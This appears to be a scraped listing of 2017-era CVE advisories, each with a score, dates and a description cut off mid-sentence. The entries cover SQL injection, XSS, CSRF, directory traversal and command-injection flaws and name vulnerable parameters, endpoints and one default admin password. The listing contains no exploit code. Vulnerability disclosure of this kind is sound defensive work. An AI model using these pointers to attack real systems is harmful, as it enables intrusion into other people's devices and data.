Directory traversal vulnerability in the charting component in Symantec Messaging Gateway before 10.6.2 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the sn parameter to brightmail/servlet/com.ve.kavachart.servlet.Ch
22-04-2017 - 10:16 14-04-2017 - 14:59
CVE-2015-8356 6.0
Multiple SQL injection vulnerabilities in the mcart.xls module 6.5.2 and earlier for Bitrix allow remote authenticated users to execute arbitrary SQL commands via the (1) xls_profile parameter to admin/mcart_xls_import.php or the (2) xls_iblock_id, (
22-04-2017 - 10:12 14-04-2017 - 10:59
CVE-2015-6567 6.5
Wolf CMS before 0.8.3.1 allows unrestricted file upload and PHP Code Execution because admin/plugin/file_manager/browse/ (aka the filemanager) does not validate the parameter "filename" properly. Exploitation requires a registered user who has access
21-04-2017 - 14:22 14-04-2017 - 12:59
CVE-2015-6568 6.5
Wolf CMS before 0.8.3.1 allows unrestricted file rename and PHP Code Execution because admin/plugin/file_manager/browse/ (aka the filemanager) does not prevent a change of a file extension to ".php" after originally using the parameter "filename" for
21-04-2017 - 14:21 14-04-2017 - 12:59
CVE-2017-7615 6.5
MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
21-04-2017 - 12:08 16-04-2017 - 10:59
CVE-2017-7725 4.3
concrete5 8.1.0 places incorrect trust in the HTTP Host header during caching, if the administrator did not define a "canonical" URL on installation of concrete5 using the "Advanced Options" settings. Remote attackers can make a GET request with any
20-04-2017 - 17:15 13-04-2017 - 13:59
CVE-2015-7562 4.3
Multiple cross-site scripting (XSS) vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) label value of an item or (2) name of a role.
20-04-2017 - 09:41 12-04-2017 - 18:59
CVE-2015-7563 6.8
Cross-site request forgery (CSRF) vulnerability in TeamPass 2.1.24 and earlier allows remote attackers to hijack the authentication of an authenticated user.
20-04-2017 - 09:40 12-04-2017 - 18:59
CVE-2015-7564 7.5
Multiple SQL injection vulnerabilities in TeamPass 2.1.24 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in an action_on_quick_icon action to item.query.php or the (2) order or (3) direction parameter in
20-04-2017 - 08:32 12-04-2017 - 18:59
CVE-2016-4337 7.5
SQL injection vulnerability in the mgr.login.php file in Ktools.net Photostore before 4.7.5 allows remote attackers to execute arbitrary SQL commands via the email parameter in a recover_login action.
19-04-2017 - 15:47 12-04-2017 - 18:59
CVE-2016-1915 4.3
Multiple cross-site scripting (XSS) vulnerabilities in BlackBerry Enterprise Server 12 (BES12) Self-Service before 12.4 allow remote attackers to inject arbitrary web script or HTML via the locale parameter to (1) mydevice/index.jsp or (2) mydevice/l
19-04-2017 - 15:46 13-04-2017 - 10:59
CVE-2016-1914 6.8
Multiple SQL injection vulnerabilities in the com.rim.mdm.ui.server.ImageServlet servlet in BlackBerry Enterprise Server 12 (BES12) Self-Service before 12.4 allow remote attackers to execute arbitrary SQL commands via the imageName parameter to (1) m
19-04-2017 - 15:45 13-04-2017 - 10:59
CVE-2015-8284 6.5
SeaWell Networks Spectrum SDC 02.05.00 allows remote viewer users to perform administrative functions.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2015-8283 6.8
Directory traversal vulnerability in configure_manage.php in SeaWell Networks Spectrum SDC 02.05.00.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2015-8282 7.5
SeaWell Networks Spectrum SDC 02.05.00 has a default password of "admin" for the "admin" account.
19-04-2017 - 15:37 13-04-2017 - 10:59
CVE-2017-7462 7.5
Intellinet NFC-30ir IP Camera has a vendor backdoor that can allow a remote attacker access to a vendor-supplied CGI script in the web directory.
18-04-2017 - 11:59 11-04-2017 - 11:59
CVE-2017-7461 6.8
Directory traversal vulnerability in the web-based management site on the Intellinet NFC-30ir IP Camera with firmware LM.1.6.16.05 allows remote attackers to read arbitrary files via a request to a vendor-supplied CGI script that is used to read HTML
18-04-2017 - 11:56 11-04-2017 - 11:59
CVE-2017-6206 5.0
D-Link DGS-1510-28XMP, DGS-1510-28X, DGS-1510-52X, DGS-1510-52, DGS-1510-28P, DGS-1510-28, and DGS-1510-20 Websmart devices with firmware before 1.31.B003 allow attackers to conduct Unauthenticated Information Disclosure attacks via unspecified vecto
17-04-2017 - 21:59 23-02-2017 - 01:59
CVE-2017-6088 9.0
Multiple SQL injection vulnerabilities in EyesOfNetwork (aka EON) 5.0 and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) bp_name, (2) display, (3) search, or (4) equipment parameter to module/monitoring_ged/ged
17-04-2017 - 14:18 11-04-2017 - 14:59
CVE-2017-7588 10.0
On certain Brother devices, authorization is mishandled by including a valid AuthCookie cookie in the HTTP response to a failed login attempt. Affected models are: MFC-J6973CDW MFC-J4420DW MFC-8710DW MFC-J4620DW MFC-L8850CDW MFC-J3720 MFC-J6520DW MFC
17-04-2017 - 11:44 12-04-2017 - 06:59
CVE-2017-5607 4.3
Splunk Enterprise 5.0.x before 5.0.18, 6.0.x before 6.0.14, 6.1.x before 6.1.13, 6.2.x before 6.2.13.1, 6.3.x before 6.3.10, 6.4.x before 6.4.6, and 6.5.x before 6.5.3 and Splunk Light before 6.5.2 assigns the $C JS property to the global Window name
17-04-2017 - 09:26 10-04-2017 - 11:59
CVE-2015-8258 7.8
AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."
13-04-2017 - 15:57 09-04-2017 - 23:59
CVE-2015-8255 6.8
AXIS Communications products allow CSRF, as demonstrated by admin/pwdgrp.cgi, vaconfig.cgi, and admin/local_del.cgi.
13-04-2017 - 14:59 09-04-2017 - 23:59
CVE-2016-7786 9.0
Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5 allows remote authenticated users to bypass intended access restrictions via direct object reference, as demonstrated by a request for Licenseinformation.jsp. This is fixed in 10.6.5.
13-04-2017 - 12:09 07-04-2017 - 17:59
CVE-2017-7571 6.0
public/rolechangeadmin in Faveo 1.9.3 allows CSRF. The impact is obtaining admin privileges.
12-04-2017 - 16:36 06-04-2017 - 13:59
CVE-2017-6884 9.0
A command injection vulnerability was discovered on the Zyxel EMG2926 home router with firmware V1.00(AAQT.4)b8. The vulnerability is located in the diagnostic tools, specifically the nslookup function. A malicious user may exploit numerous vectors t
12-04-2017 - 14:29 06-04-2017 - 13:59
CVE-2017-7398 6.8
D-Link DIR-615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated, as demonstrated by chang
11-04-2017 - 11:04 04-04-2017 - 10:59
CVE-2014-1677 5.0
Technicolor TC7200 with firmware STD6.01.12 could allow remote attackers to obtain sensitive information.
11-04-2017 - 09:36 03-04-2017 - 11:59
CVE-2017-7447 6.8
HelpDEZk 1.1.1 has CSRF in admin/home#/logos/ with an impact of remote execution of arbitrary PHP code.
10-04-2017 - 21:59 05-04-2017 - 18:59
CVE-2017-7446 6.8
HelpDEZk 1.1.1 has CSRF in admin/home#/person/ with an impact of obtaining admin privileges.
10-04-2017 - 18:19 05-04-2017 - 18:59
CVE-2017-7402 7.5
Pixie 1.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via the POST data in an admin/index.php?s=publish&x=filemanager request for a filename with a double extension, such as a .jpg.php file with Content-Type of image/
10-04-2017 - 12:24 03-04-2017 - 13:59
CVE-2017-2442 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. The issue involves the "WebKit JavaScript Bindings" component. It allows remote attackers to bypass the Same Origin Policy and obtain sens
07-04-2017 - 14:42 01-04-2017 - 21:59
CVE-2017-2479 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the
07-04-2017 - 14:41 01-04-2017 - 21:59
CVE-2017-2457 6.8
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corru
06-04-2017 - 15:33 01-04-2017 - 21:59
CVE-2017-2480 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. iCloud before 6.2 on Windows is affected. iTunes before 12.6 on Windows is affected. tvOS before 10.2 is affected. The issue involves the
06-04-2017 - 15:30 01-04-2017 - 21:59
CVE-2017-2445 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to conduct Universal XSS (UXSS) attack
06-04-2017 - 15:08 01-04-2017 - 21:59
CVE-2017-2367 4.3
An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and o
06-04-2017 - 15:08 01-04-2017 - 21:59
CVE-2017-6549 9.3
Session hijack vulnerability in httpd on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-AC1900P, RT-N
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6548 10.0
Buffer overflows in networkmap on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-AC1900P, RT-N300, an
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6547 4.3
Cross-site scripting (XSS) vulnerability in httpd on ASUS RT-N56U, RT-N66U, RT-AC66U, RT-N66R, RT-AC66R, RT-AC68U, RT-AC68R, RT-N66W, RT-AC66W, RT-AC87R, RT-AC87U, RT-AC51U, RT-AC68P, RT-N11P, RT-N12+, RT-N12E B1, RT-AC3200, RT-AC53U, RT-AC1750, RT-A
05-04-2017 - 21:59 09-03-2017 - 04:59
CVE-2017-6182 7.5
In Sophos Web Appliance (SWA) before 4.3.1.2, a section of the machine's interface responsible for generating reports was vulnerable to remote command injection via functions, aka NSWA-1304.
04-04-2017 - 14:42 30-03-2017 - 13:59
CVE-2015-8309 4.0
Directory traversal vulnerability in Cherry Music before 0.36.0 allows remote authenticated users to read arbitrary files via the "value" parameter to "download."
29-03-2017 - 21:59 27-03-2017 - 11:59
CVE-2017-6366 6.8
Cross-site request forgery (CSRF) vulnerability in NETGEAR DGN2200 routers with firmware 10.0.0.20 through 10.0.0.50 allows remote attackers to hijack the authentication of users for requests that perform DNS lookups via the host_name parameter to dn
29-03-2017 - 10:03 15-03-2017 - 10:59
CVE-2017-6087 6.5
EyesOfNetwork ("EON") 5.0 and earlier allows remote authenticated users to execute arbitrary code via shell metacharacters in the selected_events[] parameter in the (1) acknowledge, (2) delete, or (3) ownDisown function in module/monitoring_ged/ged_f
28-03-2017 - 21:59 24-03-2017 - 10:59
CVE-2017-5869 6.5
Directory traversal vulnerability in the file import feature in Nuxeo Platform 6.0, 7.1, 7.2, and 7.3 allows remote authenticated users to upload and execute arbitrary JSP code via a .. (dot dot) in the X-File-Name header.
28-03-2017 - 21:59 24-03-2017 - 10:59
CVE-2016-1000125 7.5
Unauthenticated SQL Injection in Huge-IT Catalog v1.0.7 for Joomla
28-03-2017 - 14:31 06-10-2016 - 10:59
CVE-2017-2641 7.5
In Moodle 2.x and 3.x, SQL injection can occur via user preferences.
28-03-2017 - 13:16 26-03-2017 - 14:59
CVE-2017-6972 10.0
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka AlienVault ID ENG-104945, a different vulnerability than CVE-2017-6970 and CVE-2017-6971.
28-03-2017 - 12:36 22-03-2017 - 16:59
CVE-2017-6971 9.0
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 allow remote authenticated users to execute arbitrary commands in a privileged context, or launch a reverse shell, via vectors involving the PHP session ID and the NfSen PHP code, aka Alien
28-03-2017 - 12:24 22-03-2017 - 10:59
CVE-2017-6361 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to execute arbitrary commands via unspecified vectors.
28-03-2017 - 10:44 23-03-2017 - 12:59
CVE-2017-6359 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to gain administrator privileges and execute arbitrary commands via unspecified vectors.
28-03-2017 - 10:39 23-03-2017 - 12:59
CVE-2017-6360 10.0
QNAP QTS before 4.2.4 Build 20170313 allows attackers to gain administrator privileges and obtain sensitive information via unspecified vectors.
28-03-2017 - 10:37 23-03-2017 - 12:59
CVE-2017-6896 6.5
Privilege escalation vulnerability on the DIGISOL DG-HR1400 1.00.02 wireless router enables an attacker to escalate from user privilege to admin privilege just by modifying the Base64-encoded session cookie value.
24-03-2017 - 21:59 14-03-2017 - 16:59
CVE-2017-6550 7.5
Multiple SQL injection vulnerabilities in Kinsey Infor-Lawson (formerly ESBUS) allow remote attackers to execute arbitrary SQL commands via the (1) TABLE parameter to esbus/servlet/GetSQLData or (2) QUERY parameter to KK_LS9ReportingPortal/GetData.
23-03-2017 - 11:09 20-03-2017 - 12:59
CVE-2017-5496 5.0
Sawmill Enterprise 8.7.9 allows remote attackers to gain login access by leveraging knowledge of a password hash.
21-03-2017 - 14:43 15-03-2017 - 11:59
CVE-2016-8855 4.3
Cross-Site Scripting (XSS) in "/sitecore/client/Applications/List Manager/Taskpages/Contact list" in Sitecore Experience Platform 8.1 rev. 160519 (8.1 Update-3) allows remote attacks via the Name or Description parameter. This is fixed in 8.2 Update-
21-03-2017 - 10:30 19-03-2017 - 14:59
CVE-2016-6174 6.8
applications/core/modules/front/system/content.php in Invision Power Services IPS Community Suite (aka Invision Power Board, IPB, or Power Board) before 4.1.13, when used with PHP before 5.4.24 or 5.5.x before 5.5.8, allows remote attackers to execut
20-03-2017 - 21:59 12-07-2016 - 15:59
CVE-2017-6823 6.5
Fiyo CMS 2.0.6.1 allows remote authenticated users to gain privileges via a modified level parameter to dapur/ in an app=user&act=edit action.
16-03-2017 - 21:59 12-03-2017 - 00:59
CVE-2017-6443 4.3
Cross-site scripting (XSS) vulnerability in EPSON TMNet WebConfig 1.00 allows remote attackers to inject arbitrary web script or HTML via the W_AD1 parameter to Forms/oadmin_1.
16-03-2017 - 14:17 15-03-2017 - 11:59
CVE-2017-6529 6.8
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to session hijacking by guessing the UID parameter.
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6528 4.3
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is affected by plaintext password storage (the /home/dna/spool/.pfile file).
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6527 5.0
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to a NUL-terminated directory traversal attack allowing an unauthenticated attacker to access system files readable by the web server user (by using the viewAppletFsa.cgi se
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2017-6526 10.0
An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to unauthenticated command execution through an improperly protected administrative web shell (cgi-bin/dna/sysAdmin.cgi POST requests).
14-03-2017 - 21:59 09-03-2017 - 14:59
CVE-2016-5809 6.8
An issue was discovered on Schneider Electric IONXXXX series power meters ION73XX series, ION75XX series, ION76XX series, ION8650 series, ION8800 series, and PM5XXX series. There is no CSRF Token generated to authenticate the user during a session. S
14-03-2017 - 15:18 13-02-2017 - 16:59
CVE-2015-6023 7.5
ping.cgi in NetCommWireless HSPA 3G10WVE wireless routers with firmware before 3G10WVE-L101-S306ETS-C01_R05 allows remote attackers to bypass intended access restrictions via a direct request. NOTE: this issue can be combined with CVE-2015-6024 to e
09-03-2017 - 15:33 09-02-2017 - 10:59
CVE-2017-6411 6.8
Cross Site Request Forgery (CSRF) on D-Link DSL-2730U C1 IN_1.00 devices allows remote attackers to change the DNS or firewall configuration or any password.
07-03-2017 - 21:59 06-03-2017 - 01:59
CVE-2017-6334 9.0
dnslookup.cgi on NETGEAR DGN2200 devices with firmware through 10.0.0.50 allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the host_name field of an HTTP POST request, a different vulnerability than CVE-20
07-03-2017 - 20:33 05-03-2017 - 21:59
CVE-2017-6104 5.0
Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0.
07-03-2017 - 09:17 02-03-2017 - 17:59
CVE-2017-5344 7.5
An issue was discovered in dotCMS through 3.6.1. The findChildrenByFilter() function which is called by the web accessible path /categoriesServlet performs string interpolation and direct SQL query execution. SQL quote escaping and a keyword blacklis
06-03-2017 - 21:59 17-02-2017 - 02:59
CVE-2017-6077 10.0
ping.cgi on NETGEAR DGN2200 devices with firmware through 10.0.0.50 allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ping_IPAddr field of an HTTP POST request.
01-03-2017 - 21:59 22-02-2017 - 18:59
CVE-2016-9682 10.0
The SonicWall Secure Remote Access server (version 8.1.0.2-14sv) is vulnerable to two Remote Command Injection vulnerabilities in its web administrative interface. These vulnerabilities occur in the diagnostics CGI (/cgi-bin/diagnostics) component re
01-03-2017 - 21:59 22-02-2017 - 00:59
CVE-2015-2794 7.5
The installation wizard in DotNetNuke (DNN) before 7.4.1 allows remote attackers to reinstall the application and gain SuperUser access via a direct request to Install/InstallWizard.aspx.
01-03-2017 - 21:59 06-02-2017 - 10:59
CVE-2016-6175 7.5
Eval injection vulnerability in php-gettext 1.0.12 and earlier allows remote attackers to execute arbitrary PHP code via a crafted plural forms header.
28-02-2017 - 12:49 07-02-2017 - 10:59
CVE-2017-5630 5.0
PECL in the download utility class in the Installer in PEAR Base System v1.10.1 does not validate file types and filenames after a redirect, which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess ove
28-02-2017 - 10:34 01-02-2017 - 18:59
CVE-2016-3694 7.5
Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status par
23-02-2017 - 13:20 15-02-2017 - 14:59
CVE-2017-6097 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/campaign/count_of_send.php (Requires authentication to Wordpress admin) with the POST Parameter: camp_id.
23-02-2017 - 10:07 21-02-2017 - 02:59
CVE-2017-6096 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/lists/view-list.php (Requires authentication to Wordpress admin) with the GET Parameter: filter_list.
23-02-2017 - 10:07 21-02-2017 - 02:59
CVE-2017-6095 7.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/lists/csvexport.php (Unauthenticated) with the GET Parameter: list_id.
23-02-2017 - 10:00 21-02-2017 - 02:59
CVE-2017-6098 6.5
A SQL injection issue was discovered in the Mail Masta (aka mail-masta) plugin 1.0 for WordPress. This affects /inc/campaign_save.php (Requires authentication to Wordpress admin) with the POST Parameter: list_id.
23-02-2017 - 09:57 21-02-2017 - 02:59
CVE-2016-4312 6.0
XML external entity (XXE) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 before WSO2-CARBON-PATCH-4.4.0-0231 allows remote authenticated users with access to XACML features to read arbitrary files, cause a denial of service, co
22-02-2017 - 11:23 16-02-2017 - 21:59
CVE-2016-4311 6.8
Cross-site request forgery (CSRF) vulnerability in the XACML flow feature in WSO2 Identity Server 5.1.0 allows remote attackers to hijack the authentication of privileged users for requests that process XACML requests via an entitlement/eval-policy-s
22-02-2017 - 11:20 16-02-2017 - 21:59
CVE-2017-2365 4.3
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. tvOS before 10.1.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy
22-02-2017 - 10:56 20-02-2017 - 03:59
CVE-2017-2364 4.3
An issue was discovered in certain Apple products. iOS before 10.2.1 is affected. Safari before 10.0.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to bypass the Same Origin Policy and obtain sensitive informatio
22-02-2017 - 10:56 20-02-2017 - 03:59
CVE-2009-0674 6.0
images/captcha.php in Raven Web Services RavenNuke 2.30, when register_globals and display_errors are enabled, allows remote attackers to determine the existence of local files by sending requests with full pathnames in the aFonts array parameter, an
19-02-2017 - 00:26 22-02-2009 - 17:30
CVE-2008-6282 6.5
SQL injection vulnerability in engine/users/users_edit_pub.inc in CMS Ortus 1.13 and earlier allows remote authenticated users to execute arbitrary SQL commands via the city parameter in a users_edit_pub action to index.php.
19-02-2017 - 00:25 25-02-2009 - 18:30
CVE-2008-5589 7.5
SQL injection vulnerability in processlogin.asp in Katy Whitton RankEm allows remote attackers to execute arbitrary SQL commands via the (1) txtusername parameter (aka username field) or the (2) txtpassword parameter (aka password field). NOTE: some
19-02-2017 - 00:24 16-12-2008 - 14:07
CVE-2008-4902 7.5
SQL injection vulnerability in contact_author.php in Article Publisher Pro 1.5 allows remote attackers to execute arbitrary SQL commands via the userid parameter.
19-02-2017 - 00:24 03-11-2008 - 19:58
CVE-2008-3307 7.5
SQL injection vulnerability in todos.php in C. Desseno YouTube Blog (ytb) 0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter, a different vector than CVE-2008-3306.
19-02-2017 - 00:23 25-07-2008 - 12:41
CVE-2006-2998 7.5
PHP remote file inclusion vulnerability in board/post.php in free QBoard 1.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the qb_path parameter.
19-02-2017 - 00:12 12-06-2006 - 21:02
CVE-2016-4316 4.3
Multiple cross-site scripting (XSS) vulnerabilities in WSO2 Carbon 4.4.5 allow remote attackers to inject arbitrary web script or HTML via the (1) setName parameter to identity-mgt/challenges-mgt.jsp; the (2) webappType or (3) httpPort parameter to w
17-02-2017 - 12:42 16-02-2017 - 21:59
CVE-2016-4314 4.0
Directory traversal vulnerability in the LogViewer Admin Service in WSO2 Carbon 4.4.5 allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the logFile parameter to downloadgz-ajaxprocessor.jsp.
17-02-2017 - 12:42 16-02-2017 - 21:59
CVE-2016-4315 3.5
Cross-site request forgery (CSRF) vulnerability in WSO2 Carbon 4.4.5 allows remote attackers to hijack the authentication of privileged users for requests that shutdown a server via a shutdown action to server-admin/proxy_ajaxprocessor.jsp.
17-02-2017 - 12:35 16-02-2017 - 21:59
CVE-2016-9351 6.0
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. The directory traversal/file upload error allows an attacker to upload and unpack a zip file.
17-02-2017 - 09:22 13-02-2017 - 16:59
CVE-2016-9349 5.0
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
17-02-2017 - 09:06 13-02-2017 - 16:59
CVE-2016-2539 6.8
Cross-site request forgery (CSRF) vulnerability in install_modules.php in ATutor before 2.2.2 allows remote attackers to hijack the authentication of users for requests that upload arbitrary files and execute arbitrary PHP code via vectors involving
15-02-2017 - 08:18 07-02-2017 - 10:59
CVE-2016-6433 9.0
The Threat Management Console in Cisco Firepower Management Center 5.2.0 through 6.0.1 allows remote authenticated users to execute arbitrary commands via crafted web-application parameters, aka Bug ID CSCva30872.
10-02-2017 - 21:59 06-10-2016 - 06:59
CVE-2016-7400 7.5
Multiple SQL injection vulnerabilities in Exponent CMS before 2.4.0 allow remote attackers to execute arbitrary SQL commands via the (1) id parameter in an activate_address address controller action, (2) title parameter in a show blog controller acti
09-02-2017 - 17:25 07-02-2017 - 10:59
CVE-2016-6603 5.0
ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to bypass authentication and impersonate arbitrary users via the UserName HTTP header.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6602 5.0
ZOHO WebNMS Framework 5.2 and 5.2 SP1 use a weak obfuscation algorithm to store passwords, which allows context-dependent attackers to obtain cleartext passwords by leveraging access to WEB-INF/conf/securitydbData.xml. NOTE: this issue can be combin
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6601 5.0
Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-6600 7.5
Directory traversal vulnerability in the file upload functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to upload and execute arbitrary JSP files via a .. (dot dot) in the fileName parameter to servlets/FileUploadServlet.
07-02-2017 - 21:59 23-01-2017 - 16:59
CVE-2016-3411 4.3
Cross-site scripting (XSS) vulnerability in Zimbra Collaboration before 8.7.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka bug 103609.
01-02-2017 - 21:59 18-01-2017 - 17:59
CVE-2016-4793 5.0
The clientIp function in CakePHP 3.2.4 and earlier allows remote attackers to spoof their IP via the CLIENT-IP HTTP header.
31-01-2017 - 21:59 23-01-2017 - 16:59
CVE-2017-3248 7.5
Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0 and 12.2.1.1. Easily exploitable vulnerability allows unauthentic
31-01-2017 - 11:43 27-01-2017 - 17:59
CVE-2014-2045 4.3
Multiple cross-site scripting (XSS) vulnerabilities in the old and new interfaces in Viprinet Multichannel VPN Router 300 allow remote attackers to inject arbitrary web script or HTML via the username when (1) logging in or (2) creating an account in
26-01-2017 - 14:32 20-01-2017 - 10:59
CVE-2016-10045 7.5
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal esca
25-01-2017 - 21:59 30-12-2016 - 14:59
CVE-2016-10033 7.5
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
25-01-2017 - 21:59 30-12-2016 - 14:59
CVE-2016-4010 7.5
Magento CE and EE before 2.0.6 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via crafted serialized shopping cart data.
25-01-2017 - 14:41 23-01-2017 - 16:59
CVE-2016-4340 6.5
The impersonate feature in Gitlab 8.7.0, 8.6.0 through 8.6.7, 8.5.0 through 8.5.11, 8.4.0 through 8.4.9, 8.3.0 through 8.3.8, and 8.2.0 through 8.2.4 allows remote authenticated users to "log in" as any other user via unspecified vectors.
25-01-2017 - 08:59 23-01-2017 - 16:59
CVE-2017-5521 4.3
An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices. They are prone to password disclosure via simple crafted requests to the web management server. Th
23-01-2017 - 14:14 17-01-2017 - 04:59
CVE-2016-6896 5.5
Directory traversal vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress 4.5.3 allows remote authenticated users to cause a denial of service or read certain text files via a .. (dot dot) in the plugi
20-01-2017 - 10:31 18-01-2017 - 16:59
CVE-2016-6283 4.3
Cross-site scripting (XSS) vulnerability in Atlassian Confluence before 5.10.6 allows remote attackers to inject arbitrary web script or HTML via the newFileName parameter to pages/doeditattachment.action.
20-01-2017 - 08:58 18-01-2017 - 17:59
CVE-2016-6897 4.3
Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by
20-01-2017 - 08:58 18-01-2017 - 16:59
CVE-2016-6435 4.0
The web console in Cisco Firepower Management Center 6.0.1 allows remote authenticated users to read arbitrary files via crafted parameters, aka Bug ID CSCva30376.
19-01-2017 - 21:59 06-10-2016 - 06:59
CVE-2009-0441 6.8
PHP remote file inclusion vulnerability in skin_shop/standard/2_view_body/body_default.php in TECHNOTE 7.2, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the shop_this_skin_path parameter, a diff
19-01-2017 - 21:59 10-02-2009 - 02:00
CVE-2008-4138 10.0
PHP remote file inclusion vulnerability in skin_shop/standard/3_plugin_twindow/twindow_notice.php in TECHNOTE 7 allows remote attackers to execute arbitrary PHP code via a URL in the shop_this_skin_path parameter.
19-01-2017 - 21:59 24-09-2008 - 01:41
CVE-2016-4806 5.0
Web2py versions 2.14.5 and below were affected by a Local File Inclusion vulnerability, which allows a malicious user to read/access sensitive web server files.
19-01-2017 - 11:29 11-01-2017 - 11:59
CVE-2016-4808 6.8
Web2py versions 2.14.5 and below were affected by a CSRF (Cross Site Request Forgery) vulnerability, which allows an attacker to trick a logged-in user into performing unwanted actions, i.e. an attacker can trick a victim into disabling the installed applica
19-01-2017 - 11:18 11-01-2017 - 11:59
CVE-2017-5487 5.0
wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp
18-01-2017 - 21:59 14-01-2017 - 21:59
CVE-2017-5223 2.1
